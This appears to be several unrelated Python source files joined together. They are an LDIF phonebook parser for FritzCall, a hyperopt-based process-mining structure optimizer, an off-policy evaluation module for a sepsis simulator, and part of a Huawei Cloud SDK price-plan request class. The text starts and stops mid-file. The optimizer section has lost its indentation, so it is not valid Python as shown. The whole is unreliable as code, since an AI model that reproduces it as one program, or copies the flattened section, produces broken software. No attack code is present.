        intNo = intNo.replace('(', '').replace(')', '').replace(' ', '').replace('/', '').replace('-', '')
        found = re.match(r'^49(.*)', intNo) # this is most probably an error
        if found:
            intNo = '0' + found.group(1)
        found = re.match(r'.*?([0-9]+)', intNo)
        if found:
            return found.group(1)
        else:
            return '0'
import logging
# Module-level logger for the FritzCall LDIF phonebook backend.
logger = logging.getLogger("[FritzCall] LDIF")
# Shorthand used throughout this module.
debug = logger.debug
def out(number, name):
    """Print a phonebook entry on stdout in 'number#name' form."""
    print('#'.join((number, name)))
class FindNumber(ldif.LDIFParser):
    """LDIF parser that looks up one phone number and reports the first
    matching entry through *outFun*, then stops parsing.

    NOTE(review): this block's indentation was reconstructed; the nesting
    below follows the ReadNumbers analogue and should be confirmed against
    the upstream FritzCall source.
    """
    def __init__(self, number, inp, outFun):
        # number -- already-normalized number to search for
        # inp    -- open LDIF file object
        # outFun -- callback(number, descriptive_string)
        ldif.LDIFParser.__init__(self, inp)
        self.outFun = outFun
        self.number = number
        try:
            self.parse()
        except ValueError:
            # this is to exit the parse loop: handle() closes the input
            # file as soon as it has a result
            pass
    def handle(self, dn, entry):
        """Process one LDIF entry; emit a result and stop on a match."""
        # debug("[FritzCallPhonebook] LDIF handle: " + dn)
        found = re.match('.*cn=(.*),', str(dn))
        if found:
            name = found.group(1)
        else:
            # entries without a cn are ignored
            return
        address = ""
        addressB = ""
        # Business numbers: telephoneNumber, or home/mobile when they match.
        if 'telephoneNumber' in entry or ('homePhone' in entry and self.number == normalizePhoneNumber(entry['homePhone'][0])) or ('mobile' in entry and self.number == normalizePhoneNumber(entry['mobile'][0])):
            # debug("[FritzCallPhonebook] LDIF get address")
            if 'telephoneNumber' in entry:
                no = normalizePhoneNumber(entry['telephoneNumber'][0])
            else:
                # NOTE(review): 0 (int) can never equal self.number (str);
                # presumably intentional "no business number" marker.
                no = 0
            if self.number == no or ('homePhone' in entry and self.number == normalizePhoneNumber(entry['homePhone'][0])) or ('mobile' in entry and self.number == normalizePhoneNumber(entry['mobile'][0])):
                nameB = (name + ' (' + _('business') + ')') if name else ""
                if 'company' in entry:
                    nameB = (nameB + ', ' + entry['company'][0]) if nameB else entry['company'][0]
                if 'l' in entry:
                    # Compose the business address: street, postalCode city, country
                    addressB = entry['l'][0]
                    if 'postalCode' in entry:
                        addressB = entry['postalCode'][0] + ' ' + addressB
                    if 'c' in entry:
                        addressB = addressB + ', ' + entry['c'][0]
                    if 'street' in entry:
                        addressB = entry['street'][0] + ', ' + addressB
                    # debug("[FritzCallPhonebook] LDIF address: " + addressB)
                    if self.number == no:
                        result = nameB + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
                        debug("[FritzCallPhonebook] LDIF result: " + result)
                        self.outFun(no, result)
                        self._input_file.close()
                        return
                else:
                    if self.number == no:
                        result = nameB.replace('\n', ', ').replace('\r', '').replace('#', '')
                        debug("[FritzCallPhonebook] LDIF result: " + result)
                        self.outFun(no, result)
                        self._input_file.close()
                        return
        # Private numbers: home and mobile, using the mozillaHome* address.
        for i in ['homePhone', 'mobile']:
            if i in entry:
                no = normalizePhoneNumber(entry[i][0])
                if self.number == no:
                    if i == 'mobile':
                        name = name + ' (' + _('mobile') + ')'
                    else:
                        name = name + ' (' + _('home') + ')'
                    if 'mozillaHomeLocalityName' in entry:
                        address = entry['mozillaHomeLocalityName'][0]
                        if 'mozillaHomePostalCode' in entry:
                            address = entry['mozillaHomePostalCode'][0] + ' ' + address
                        if 'mozillaHomeCountryName' in entry:
                            address = address + ', ' + entry['mozillaHomeCountryName'][0]
                        # NOTE(review): logs addressB here, not the home
                        # address just built -- looks like a copy/paste slip.
                        debug("[FritzCallPhonebook] LDIF home address: " + addressB)
                        result = name + ', ' + address.replace('\n', ', ').replace('\r', '').replace('#', '')
                        debug("[FritzCallPhonebook] LDIF result: " + result)
                        self.outFun(no, result)
                        self._input_file.close()
                        return
                    else:
                        if addressB:
                            # fall back to the business address when present
                            name = name + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
                        debug("[FritzCallPhonebook] LDIF result: " + name)
                        self.outFun(no, name)
                        self._input_file.close()
                        return
class ReadNumbers(ldif.LDIFParser):
    """LDIF parser that reports every phone number found, with a descriptive
    name/address string, through *outFun*.

    NOTE(review): this block's indentation was reconstructed; the nesting
    below mirrors FindNumber and should be confirmed against the upstream
    FritzCall source.
    """
    def __init__(self, inPut, outFun):
        # inPut  -- open LDIF file object
        # outFun -- callback(number, descriptive_string), called per number
        ldif.LDIFParser.__init__(self, inPut)
        self.outFun = outFun
        try:
            self.parse()
        except ValueError:
            #
            # this is to exit the parse loop:
            # we close the input file as soon as we have a result...
            #
            pass
    def handle(self, dn, entry):
        """Process one LDIF entry and emit all of its phone numbers."""
        # debug("[FritzCallPhonebook] LDIF handle: " + dn)
        found = re.match('.*cn=(.*),', str(dn))
        if found:
            name = found.group(1)
        else:
            # entries without a cn are ignored
            return
        address = ""
        addressB = ""
        # Business number (telephoneNumber) with optional business address.
        if 'telephoneNumber' in entry or 'homePhone' in entry or 'mobile' in entry:
            # debug("[FritzCallPhonebook] LDIF get address")
            nameB = (name + ' (' + _('business') + ')') if name else ""
            if 'company' in entry:
                nameB = (nameB + ', ' + entry['company'][0]) if nameB else entry['company'][0]
            if 'l' in entry:
                # Compose the business address: street, postalCode city, country
                addressB = entry['l'][0]
                if 'postalCode' in entry:
                    addressB = entry['postalCode'][0] + ' ' + addressB
                if 'c' in entry:
                    addressB = addressB + ', ' + entry['c'][0]
                if 'street' in entry:
                    addressB = entry['street'][0] + ', ' + addressB
                # debug("[FritzCallPhonebook] LDIF address: " + addressB)
                if 'telephoneNumber' in entry:
                    no = normalizePhoneNumber(entry['telephoneNumber'][0])
                    result = nameB + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
                    self.outFun(no, result)
            else:
                # No locality: emit the business number without an address.
                if 'telephoneNumber' in entry:
                    no = normalizePhoneNumber(entry['telephoneNumber'][0])
                    result = nameB.replace('\n', ', ').replace('\r', '').replace('#', '')
                    self.outFun(no, result)
        # Private numbers: home and mobile, using the mozillaHome* address.
        for i in ['homePhone', 'mobile']:
            if i in entry:
                no = normalizePhoneNumber(entry[i][0])
                if i == 'mobile':
                    nameHM = name + ' (' + _('mobile') + ')'
                else:
                    nameHM = name + ' (' + _('home') + ')'
                if 'mozillaHomeLocalityName' in entry:
                    address = entry['mozillaHomeLocalityName'][0]
                    if 'mozillaHomePostalCode' in entry:
                        address = entry['mozillaHomePostalCode'][0] + ' ' + address
                    if 'mozillaHomeCountryName' in entry:
                        address = address + ', ' + entry['mozillaHomeCountryName'][0]
                    result = nameHM + ', ' + address.replace('\n', ', ').replace('\r', '').replace('#', '')
                    self.outFun(no, result)
                else:
                    if addressB:
                        # fall back to the business address when present
                        nameHM = nameHM + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
                        self.outFun(no, nameHM)
def lookedUp(number, name):
    """Print a lookup result on stdout as 'number name'."""
    print(' '.join((number, name)))
if __name__ == '__main__':
    import os, sys
    # NOTE(review): cwd is computed but never used below.
    cwd = os.path.dirname(sys.argv[0])
    if (len(sys.argv) == 1):
        # No argument: dump every entry from the LDIF file.
        ReadNumbers(open("Kontakte.ldif"), out)
    elif (len(sys.argv) == 2):
        # nrzuname.py Nummer
        # One argument: look up that number and print the matching entry.
        FindNumber(sys.argv[1], open("Kontakte.ldif"), lookedUp)
|
<gh_stars>1-10
import copy
import math
import os
import random
from pathlib import Path
import numpy as np
import pandas as pd
from hyperopt import Trials, hp, fmin, STATUS_OK, STATUS_FAIL
from hyperopt import tpe
from . import support_utils as sup
from .cli_formatter import print_message, print_subsection
from .common_routines import mine_resources, extract_structure_parameters, split_timeline, evaluate_logs, \
save_times
from .configuration import Configuration, MiningAlgorithm, Metric, AndPriorORemove
from .decorators import timeit, safe_exec_with_values_and_status
from .readers.log_reader import LogReader
from .simulator import simulate
from .structure_miner import StructureMiner
from .support_utils import get_project_dir
from .writers import xml_writer as xml, xes_writer as xes
class StructureOptimizer:
"""Hyperparameter-optimizer class"""
# @profile(stream=open('logs/memprof_StructureOptimizer.log', 'a+'))
def __init__(self, settings: Configuration, log: LogReader, **kwargs):
    """Set up the optimizer: search space, train/validation split,
    output folder, results file and the hyperopt Trials tracker.

    settings -- mining/optimization configuration
    log      -- event log; split 80/20 into train and validation parts
    """
    self.space = self.define_search_space(settings)
    self.log = log
    # NOTE(review): _split_timeline is defined outside this excerpt; it
    # presumably populates self.log_train / self.log_valdn -- confirm.
    self._split_timeline(0.8, settings.read_options.one_timestamp)
    # Pristine copies, restored between trials.
    self.org_log = copy.deepcopy(log)
    self.org_log_train = copy.deepcopy(self.log_train)
    self.org_log_valdn = copy.deepcopy(self.log_valdn)
    # Load settings
    self.settings = settings
    self.temp_output = get_project_dir() / 'outputs' / sup.folder_id()
    if not os.path.exists(self.temp_output):
        os.makedirs(self.temp_output)
    self.file_name = os.path.join(self.temp_output, sup.file_id(prefix='OP_'))
    # Results file (created empty up front)
    if not os.path.exists(self.file_name):
        open(self.file_name, 'w').close()
    # Trials object to track progress
    self.bayes_trials = Trials()
    self.best_output = None
    self.best_parms = dict()
    self.best_similarity = 0
@staticmethod
def define_search_space(settings: Configuration):
var_dim = {'gate_management': hp.choice('gate_management', settings.gate_management)}
if settings.mining_alg in [MiningAlgorithm.SM1, MiningAlgorithm.SM3]:
var_dim['epsilon'] = hp.uniform('epsilon', settings.epsilon[0], settings.epsilon[1])
var_dim['eta'] = hp.uniform('eta', settings.eta[0], settings.eta[1])
var_dim['and_prior'] = hp.choice('and_prior', AndPriorORemove.to_str(settings.and_prior))
var_dim['or_rep'] = hp.choice('or_rep', AndPriorORemove.to_str(settings.or_rep))
elif settings.mining_alg is MiningAlgorithm.SM2:
var_dim['concurrency'] = hp.uniform('concurrency', settings.concurrency[0], settings.concurrency[1])
csettings = copy.deepcopy(settings.__dict__)
for key in var_dim.keys():
csettings.pop(key, None)
space = {**var_dim, **csettings}
return space
# @profile(stream=open('logs/memprof_StructureOptimizer.log', 'a+'))
def execute_trials(self):
parameters = mine_resources(self.settings)
self.log_train = copy.deepcopy(self.org_log_train)
# @profile(stream=open('logs/memprof_StructureOptimizer.log', 'a+'))
def exec_pipeline(trial_stg: Configuration):
print_subsection("Trial")
print_message(f'train split: {len(pd.DataFrame(self.log_train.data).caseid.unique())}, '
f'validation split: {len(self.log_valdn.caseid.unique())}')
status = STATUS_OK
exec_times = dict()
sim_values = []
# Path redefinition
rsp = self._temp_path_redef(trial_stg, status=status, log_time=exec_times)
status = rsp['status']
trial_stg = rsp['values'] if status == STATUS_OK else trial_stg
# Structure mining
rsp = self._mine_structure(Configuration(**trial_stg), status=status, log_time=exec_times)
status = rsp['status']
# Parameters extraction
rsp = self._extract_parameters(trial_stg, rsp['values'], copy.deepcopy(parameters), status=status,
log_time=exec_times)
status = rsp['status']
# Simulate model
# rsp = self._simulate(trial_stg, self.log_valdn, status=status, log_time=exec_times)
# rsp = simulate(trial_stg, self.log_valdn, self.log_valdn, evaluate_fn=evaluate_logs)
rsp = self._simulate(trial_stg, status=status)
status = rsp['status']
sim_values = rsp['values'] if status == STATUS_OK else sim_values
# Save times
save_times(exec_times, trial_stg, self.temp_output)
# Optimizer results
rsp = self._define_response(trial_stg, status, sim_values)
# reinstate log
self.log = copy.deepcopy(self.org_log)
self.log_train = copy.deepcopy(self.org_log_train)
self.log_valdn = copy.deepcopy(self.org_log_valdn)
return rsp
# Optimize
best = fmin(fn=exec_pipeline,
space=self.space,
algo=tpe.suggest,
max_evals=self.settings.max_eval_s,
trials=self.bayes_trials,
show_progressbar=False)
# Save results
try:
results = pd.DataFrame(self.bayes_trials.results).sort_values('loss', ascending=bool)
self.best_output = results[results.status == 'ok'].head(1).iloc[0].output
self.best_parms = best
self.best_similarity = results[results.status == 'ok'].head(1).iloc[0].loss
except Exception as e:
print(e)
pass
# @profile(stream=open('logs/memprof_StructureOpimizer._temp_path_redef.log', 'a+'))
@timeit(rec_name='PATH_DEF')
@safe_exec_with_values_and_status
def _temp_path_redef(self, settings: dict, **kwargs) -> None:
# Paths redefinition
settings['output'] = Path(os.path.join(self.temp_output, sup.folder_id()))
# Output folder creation
if not os.path.exists(settings['output']):
os.makedirs(settings['output'])
os.makedirs(os.path.join(settings['output'], 'sim_data'))
# Create customized event-log for the external tools
output_path = Path(os.path.join(settings['output'], (settings['project_name'] + '.xes')))
xes.XesWriter(self.log_train, settings['read_options'], output_path)
return settings
@timeit(rec_name='MINING_STRUCTURE')
@safe_exec_with_values_and_status
def _mine_structure(self, settings: Configuration, **kwargs) -> None:
structure_miner = StructureMiner(settings)
structure_miner.execute_pipeline()
if structure_miner.is_safe:
return [structure_miner.bpmn, structure_miner.process_graph]
else:
raise RuntimeError('Mining Structure error')
# @profile(stream=open('logs/memprof_StructureOptimizer._extract_parameters.log', 'a+'))
@timeit(rec_name='EXTRACTING_PARAMS')
@safe_exec_with_values_and_status
def _extract_parameters(self, settings: Configuration, structure_values, parameters, **kwargs) -> None:
if isinstance(settings, dict):
settings = Configuration(**settings)
_, process_graph = structure_values
num_inst = len(self.log_valdn.caseid.unique()) # TODO: why do we use log_valdn instead of log_train?
start_time = self.log_valdn.start_timestamp.min().strftime("%Y-%m-%dT%H:%M:%S.%f+00:00") # getting minimum date
model_path = Path(os.path.join(settings.output, settings.project_name + '.bpmn'))
structure_parameters = extract_structure_parameters(
settings=settings, process_graph=process_graph, log=self.log_train, model_path=model_path)
parameters = {**parameters, **{'resource_pool': structure_parameters.resource_pool,
'time_table': structure_parameters.time_table,
'arrival_rate': structure_parameters.arrival_rate,
'sequences': structure_parameters.sequences,
'elements_data': structure_parameters.elements_data,
'instances': num_inst,
'start_time': start_time}}
bpmn_path = os.path.join(settings.output, settings.project_name + '.bpmn')
xml.print_parameters(bpmn_path, bpmn_path, parameters)
self.log_valdn.rename(columns={'user': 'resource'}, inplace=True)
self.log_valdn['source'] = 'log'
self.log_valdn['run_num'] = 0
self.log_valdn['role'] = 'SYSTEM'
self.log_valdn = self.log_valdn[~self.log_valdn.task.isin(['Start', 'End'])]
@safe_exec_with_values_and_status
def _simulate(self, trial_stg, **kwargs):
return simulate(trial_stg, self.log_valdn, self.log_valdn, evaluate_fn=evaluate_logs)
# @timeit(rec_name='SIMULATION_EVAL')
# @safe_exec_with_values_and_status
# def _simulate(self, settings: Configuration, data, **kwargs) -> list:
# if isinstance(settings, dict):
# settings = Configuration(**settings)
#
# reps = settings.repetitions
# cpu_count = multiprocessing.cpu_count()
# w_count = reps if reps <= cpu_count else cpu_count
# pool = multiprocessing.Pool(processes=w_count)
#
# # Simulate
# args = [(settings, rep) for rep in range(reps)]
# p = pool.map_async(execute_simulator, args)
# pbar_async(p, 'simulating:', reps)
#
# # Read simulated logs
# p = pool.map_async(read_stats, args)
# pbar_async(p, 'reading simulated logs:', reps)
#
# # Evaluate
# args = [(settings, data, log) for log in p.get()]
# if len(self.log_valdn.caseid.unique()) > 1000:
# pool.close()
# results = [evaluate_logs(arg) for arg in tqdm(args, 'evaluating results:')]
# sim_values = list(itertools.chain(*results))
# else:
# p = pool.map_async(evaluate_logs, args)
# pbar_async(p, 'evaluating results:', reps)
# pool.close()
# sim_values = list(itertools.chain(*p.get()))
# return sim_values
def _define_response(self, settings, status, sim_values, **kwargs) -> dict:
response = dict()
measurements = list()
data = {
'gate_management': settings['gate_management'],
'output': settings['output'],
}
# Miner parameters
if settings['mining_alg'] in [MiningAlgorithm.SM1, MiningAlgorithm.SM3]:
data['epsilon'] = settings['epsilon']
data['eta'] = settings['eta']
data['and_prior'] = settings['and_prior']
data['or_rep'] = settings['or_rep']
elif settings['mining_alg'] is MiningAlgorithm.SM2:
data['concurrency'] = settings['concurrency']
else:
raise ValueError(settings['mining_alg'])
similarity = 0
# response['params'] = settings
response['output'] = settings['output']
if status == STATUS_OK:
similarity = np.mean([x['sim_val'] for x in sim_values])
loss = (1 - similarity)
response['loss'] = loss
response['status'] = status if loss > 0 else STATUS_FAIL
for sim_val in sim_values:
measurements.append({
**{'similarity': sim_val['sim_val'],
'sim_metric': sim_val['metric'],
'status': response['status']},
**data})
else:
response['status'] = status
measurements.append({**{'similarity': 0,
'sim_metric': Metric.DL,
'status': response['status']},
**data})
if os.path.getsize(self.file_name) > 0:
sup.create_csv_file(measurements, self.file_name, mode='a')
else:
sup.create_csv_file_header(measurements, self.file_name)
return response
def _split_timeline(self, size: float, one_ts: bool) -> None:
"""
Split an event log dataframe by time to perform split-validation. preferred method time splitting removing
incomplete traces. If the testing set is smaller than the 10% of the log size the second method is sort by
traces start and split taking the whole traces no matter if they are contained in the timeframe or not
Parameters
----------
size: float, validation percentage.
one_ts: bool, Support only one timestamp.
"""
train, validation, key = split_timeline(self.log, size, one_ts)
train = self._sample_log(train)
# Save partitions
self.log_valdn = validation.sort_values(key, ascending=True).reset_index(drop=True)
self.log_train = LogReader.copy_without_data(self.log)
self.log_train.set_data(train.sort_values(key, ascending=True).reset_index(drop=True).to_dict('records'))
@staticmethod
def _sample_log(train):
def sample_size(p_size, c_level, c_interval):
"""
p_size : population size.
c_level : confidence level.
c_interval : confidence interval.
"""
c_level_constant = {50: .67, 68: .99, 90: 1.64, 95: 1.96, 99: 2.57}
Z = 0.0
p = 0.5
e = c_interval / 100.0
N = p_size
n_0 = 0.0
n = 0.0
# DEVIATIONS FOR THAT CONFIDENCE LEVEL
Z = c_level_constant[c_level]
# CALC SAMPLE SIZE
n_0 = ((Z ** 2) * p * (1 - p)) / (e ** 2)
# ADJUST SAMPLE SIZE FOR FINITE POPULATION
n = n_0 / (1 + ((n_0 - 1) / float(N)))
return int(math.ceil(n)) # THE SAMPLE SIZE
cases = list(train.caseid.unique())
if len(cases) > 1000:
sample_sz = sample_size(len(cases), 95.0, 3.0)
scases = random.sample(cases, sample_sz)
train = train[train.caseid.isin(scases)]
return train
|
import numpy as np
import torch
from sepsisSimDiabetes.State import State
# Columns read from the behavior dataframe as per-step state features
# (sepsis-simulator vitals and treatment flags).
feature_names = ["hr_state", "sysbp_state", "glucose_state",
                 "antibiotic_state", "vaso_state", "vent_state"]
# 'grade_norm' and 'pre' are relatively categorical/discrete
#unused_features = ['input_message_kid', 'time_stored', 'grade']
# categorical_features = ['stage'] # postive_feedback
# feature_names = ['grade_norm', 'pre-score_norm', 'stage_norm', 'failed_attempts_norm',
#                  'pos_norm', 'neg_norm', 'hel_norm', 'anxiety_norm']
# Columns holding the behavior policy's probabilities for the 8 actions.
target_names = ["beh_p_0","beh_p_1","beh_p_2","beh_p_3","beh_p_4","beh_p_5","beh_p_6","beh_p_7"]
# feature_names = feature_names + categorical_features
# Default maximum trajectory length (horizon); functions below may shadow
# this with the actual maximum observed in the data.
MAX_TIME = 28
def compute_is_weights_for_mdp_policy(behavior_df, eval_policy, eps=0.05, temp=0.1,
                                      reward_column='adjusted_score', no_grad=True,
                                      gr_safety_thresh=0.0, is_train=True, normalize_reward=False, use_knn=False,
                                      model_round_as_feature=False):
    """Build per-trajectory tensors for importance-sampling off-policy evaluation.

    Groups ``behavior_df`` by 'Trajectory' and, for each trajectory, gathers
    the behavior policy's probability of each taken action (pibs), the
    evaluation policy's probability of the same action (pies), and the
    trajectory's terminal reward, padded into (n, MAX_TIME) tensors.

    Returns:
        (pibs, pies, rewards, lengths, MAX_TIME) where MAX_TIME is the
        longest trajectory length observed in ``behavior_df``.

    NOTE(review): only reward_column == 'Reward' is supported — any other
    value (including the default 'adjusted_score') reaches the final else
    branch and raises. Confirm callers always pass 'Reward'.
    """
    # is_weights with batch processing
    df = behavior_df
    user_ids = df['Trajectory'].unique()
    n = len(user_ids)
    # now max_time is dynamic, finally!!
    # (this local MAX_TIME shadows the module-level constant of the same name)
    MAX_TIME = max(behavior_df.groupby('Trajectory').size())
    # assert reward_column in ['adjusted_score', 'reward']
    pies = torch.zeros((n, MAX_TIME))  # originally 20
    pibs = torch.zeros((n, MAX_TIME))
    rewards = torch.zeros((n, MAX_TIME))
    lengths = np.zeros((n))  # we are not doing anything to this
    # compute train split reward mean and std
    # (n,): and not average
    user_rewards = df.groupby("Trajectory")[reward_column].mean()
    train_reward_mu = user_rewards.mean()
    train_reward_std = user_rewards.std()
    for idx, user_id in enumerate(user_ids):
        data = df[df['Trajectory'] == user_id]
        # get features, targets
        if not model_round_as_feature:
            features = np.asarray(data[feature_names]).astype(float)
            # Map each full-state id to its projected-observation index so the
            # tabular eval_policy can be indexed by state below.
            features_idx_list = []
            for feature_idx in data['State_id']:
                this_state = State(state_idx=feature_idx, idx_type='full',
                                   diabetic_idx=1)  # Diab a req argument, no difference
                # assert this_state == State(state_idx = feature_idx, idx_type = 'full', diabetic_idx = 0)
                features_idx_list.append(this_state.get_state_idx('proj_obs'))
            features_idxs = np.array(features_idx_list).astype(int)
        else:
            features = np.asarray(data[feature_names + ['model_round']]).astype(float)
        targets = np.asarray(data[target_names]).astype(float)
        actions = np.asarray(data['Action_taken']).astype(int)
        length = features.shape[0]
        lengths[idx] = length
        T = targets.shape[0]
        # shape: (1, T)
        # Behavior-policy probability of the action actually taken at each step.
        beh_probs = torch.from_numpy(np.array([targets[i, a] for i, a in enumerate(actions)])).float()
        pibs[idx, :T] = beh_probs
        gr_mask = None
        if gr_safety_thresh > 0:
            if not is_train:
                # we only use KNN during validation
                if not use_knn:
                    gr_mask = None
                # else:
                #     knn_targets = np.asarray(data[knn_target_names]).astype(float)
                #     assert knn_targets.shape[0] == targets.shape[0]
                #     beh_action_probs = torch.from_numpy(knn_targets)
                #
                #     gr_mask = beh_action_probs >= gr_safety_thresh
            else:
                beh_action_probs = torch.from_numpy(targets)
                # gr_mask = beh_probs >= gr_safety_thresh
                gr_mask = beh_action_probs >= gr_safety_thresh
                # need to renormalize behavior policy as well?
        # assign rewards (note adjusted_score we only assign to last step)
        # reward, we assign to all
        if reward_column == 'Reward':
            # Trajectory reward = the nonzero terminal reward (max, or min if
            # the max is 0, i.e. the reward is negative).
            reward = max(np.asarray(data[reward_column]))
            if reward == 0:
                reward = min(np.asarray(data[reward_column]))
            # only normalize reward during training
            # if reward != 0:
            #     print("reward is {}".format(reward))
            if normalize_reward and is_train:
                # might not be the best -- we could just do a plain shift instead
                # like -1 shift
                reward = (reward - train_reward_mu) / train_reward_std
                # print(reward)
            # if reward != 0:
            #     print("reward is not zero")
            rewards[idx, T - 1] = reward
        else:
            # normal reward
            # rewards[idx, :T] = torch.from_numpy(np.asarray(data[reward_column])).float()
            raise Exception("We currrently do not offer training in this mode")
        # last thing: model prediction
        # eval_action_probs = eval_policy.get_action_probability(torch.from_numpy(features).float(), no_grad,
        #                                                        action_mask=gr_mask)
        # NOTE(review): features_idxs is assigned only in the
        # not-model_round_as_feature branch above; with
        # model_round_as_feature=True this line raises NameError — confirm.
        eval_action_probs = torch.from_numpy(eval_policy[features_idxs, :])
        pies[idx, :T] = torch.hstack([eval_action_probs[i, a] for i, a in enumerate(actions)])
    return pibs, pies, rewards, lengths.astype(int), MAX_TIME
def wis_ope(pibs, pies, rewards, length, no_weight_norm=False, max_time=28, per_sample=False, clip_lower=1e-16,
            clip_upper=1e3):
    """Weighted importance sampling (WIS) off-policy evaluation.

    Args:
        pibs: (n, T) behavior-policy probabilities of the taken actions.
        pies: (n, T) evaluation-policy probabilities of the same actions.
        rewards: (n, T) per-step rewards (typically terminal-only).
        length: length-n array/list of trajectory lengths.
        no_weight_norm: if True, divide by n (ordinary IS) instead of
            normalizing each step's weights across trajectories (WIS).
        max_time: horizon T of the padded tensors; default 28 mirrors the
            module-level MAX_TIME constant.
        per_sample: if True, return per-trajectory weighted returns instead
            of their sum.
        clip_lower, clip_upper: clipping bounds for the cumulative weights.

    Returns:
        (estimate, weights[:, -1]) — the (per-sample or aggregated) WIS
        estimate and the final per-trajectory weights.
    """
    # even for batch setting, this function should still work fine
    # but for WIS, batch setting won't give accurate normalization
    n = pibs.shape[0]
    # BUG FIX: previously sized with the module-global MAX_TIME, ignoring the
    # max_time parameter — trajectories longer than 28 steps indexed out of
    # bounds. Use the parameter so the horizon matches the input tensors.
    weights = torch.ones((n, max_time))
    for i in range(n):
        last = 1
        for t in range(int(length[i])):
            assert pibs[i, t] != 0
            last = last * (pies[i, t] / pibs[i, t])
            weights[i, t] = last
        # Carry the final cumulative ratio forward over the padded tail.
        weights[i, length[i]:] = weights[i, length[i] - 1]
    # weights = torch.clip(weights, 1e-16, 1e3)
    weights = torch.clip(weights, clip_lower, clip_upper)
    if not no_weight_norm:
        weights_norm = weights.sum(dim=0)
        weights /= weights_norm  # per-step weights (it's cumulative)
    else:
        weights /= n
    # this accumulates
    if not per_sample:
        return (weights[:, -1] * rewards.sum(dim=-1)).sum(dim=0), weights[:, -1]
    else:
        # return w_i associated with each N
        return weights[:, -1] * rewards.sum(dim=-1), weights[:, -1]
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListProPricePlansRequest:
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attributes whose values are masked as "****" in to_dict().
    sensitive_list = []

    openapi_types = {
        'limit': 'int',
        'offset': 'int',
        'main_search_key': 'str',
        'flow_total': 'int',
        'network_type': 'int',
        'location_type': 'int',
        'carrier_type': 'int',
        'country_type': 'int',
        'sim_card_id': 'int',
        'partner': 'int',
        'package_type': 'int',
        'sim_type': 'int'
    }

    attribute_map = {
        'limit': 'limit',
        'offset': 'offset',
        'main_search_key': 'main_search_key',
        'flow_total': 'flow_total',
        'network_type': 'network_type',
        'location_type': 'location_type',
        'carrier_type': 'carrier_type',
        'country_type': 'country_type',
        'sim_card_id': 'sim_card_id',
        'partner': 'partner',
        'package_type': 'package_type',
        'sim_type': 'sim_type'
    }

    def __init__(self, limit=None, offset=None, main_search_key=None, flow_total=None, network_type=None, location_type=None, carrier_type=None, country_type=None, sim_card_id=None, partner=None, package_type=None, sim_type=None):
        """ListProPricePlansRequest - a model defined in huaweicloud sdk"""
        self._limit = None
        self._offset = None
        self._main_search_key = None
        self._flow_total = None
        self._network_type = None
        self._location_type = None
        self._carrier_type = None
        self._country_type = None
        self._sim_card_id = None
        self._partner = None
        self._package_type = None
        self._sim_type = None
        self.discriminator = None
        # Route each provided argument through its property setter.
        if limit is not None:
            self.limit = limit
        if offset is not None:
            self.offset = offset
        if main_search_key is not None:
            self.main_search_key = main_search_key
        if flow_total is not None:
            self.flow_total = flow_total
        if network_type is not None:
            self.network_type = network_type
        if location_type is not None:
            self.location_type = location_type
        if carrier_type is not None:
            self.carrier_type = carrier_type
        if country_type is not None:
            self.country_type = country_type
        if sim_card_id is not None:
            self.sim_card_id = sim_card_id
        if partner is not None:
            self.partner = partner
        if package_type is not None:
            self.package_type = package_type
        if sim_type is not None:
            self.sim_type = sim_type

    @property
    def limit(self):
        """Gets the limit of this ListProPricePlansRequest.

        Number of records shown per page; default 10; integer in the range 10-500.

        :return: The limit of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._limit

    @limit.setter
    def limit(self, limit):
        """Sets the limit of this ListProPricePlansRequest.

        Number of records shown per page; default 10; integer in the range 10-500.

        :param limit: The limit of this ListProPricePlansRequest.
        :type: int
        """
        self._limit = limit

    @property
    def offset(self):
        """Gets the offset of this ListProPricePlansRequest.

        Page number for pagination; default 1; integer in the range 1-1000000.

        :return: The offset of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._offset

    @offset.setter
    def offset(self, offset):
        """Sets the offset of this ListProPricePlansRequest.

        Page number for pagination; default 1; integer in the range 1-1000000.

        :param offset: The offset of this ListProPricePlansRequest.
        :type: int
        """
        self._offset = offset

    @property
    def main_search_key(self):
        """Gets the main_search_key of this ListProPricePlansRequest.

        Search key: the price-plan name, e.g. "Hong Kong (China) 10M monthly connectivity plan".

        :return: The main_search_key of this ListProPricePlansRequest.
        :rtype: str
        """
        return self._main_search_key

    @main_search_key.setter
    def main_search_key(self, main_search_key):
        """Sets the main_search_key of this ListProPricePlansRequest.

        Search key: the price-plan name, e.g. "Hong Kong (China) 10M monthly connectivity plan".

        :param main_search_key: The main_search_key of this ListProPricePlansRequest.
        :type: str
        """
        self._main_search_key = main_search_key

    @property
    def flow_total(self):
        """Gets the flow_total of this ListProPricePlansRequest.

        Total data volume (MB).

        :return: The flow_total of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._flow_total

    @flow_total.setter
    def flow_total(self, flow_total):
        """Sets the flow_total of this ListProPricePlansRequest.

        Total data volume (MB).

        :param flow_total: The flow_total of this ListProPricePlansRequest.
        :type: int
        """
        self._flow_total = flow_total

    @property
    def network_type(self):
        """Gets the network_type of this ListProPricePlansRequest.

        Network standard (e.g. cellular network type).

        :return: The network_type of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._network_type

    @network_type.setter
    def network_type(self, network_type):
        """Sets the network_type of this ListProPricePlansRequest.

        Network standard (e.g. cellular network type).

        :param network_type: The network_type of this ListProPricePlansRequest.
        :type: int
        """
        self._network_type = network_type

    @property
    def location_type(self):
        """Gets the location_type of this ListProPricePlansRequest.

        Coverage region: 1. China 2. Europe 3. Oceania 4. Africa 5. Asia-Pacific

        :return: The location_type of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._location_type

    @location_type.setter
    def location_type(self, location_type):
        """Sets the location_type of this ListProPricePlansRequest.

        Coverage region: 1. China 2. Europe 3. Oceania 4. Africa 5. Asia-Pacific

        :param location_type: The location_type of this ListProPricePlansRequest.
        :type: int
        """
        self._location_type = location_type

    @property
    def carrier_type(self):
        """Gets the carrier_type of this ListProPricePlansRequest.

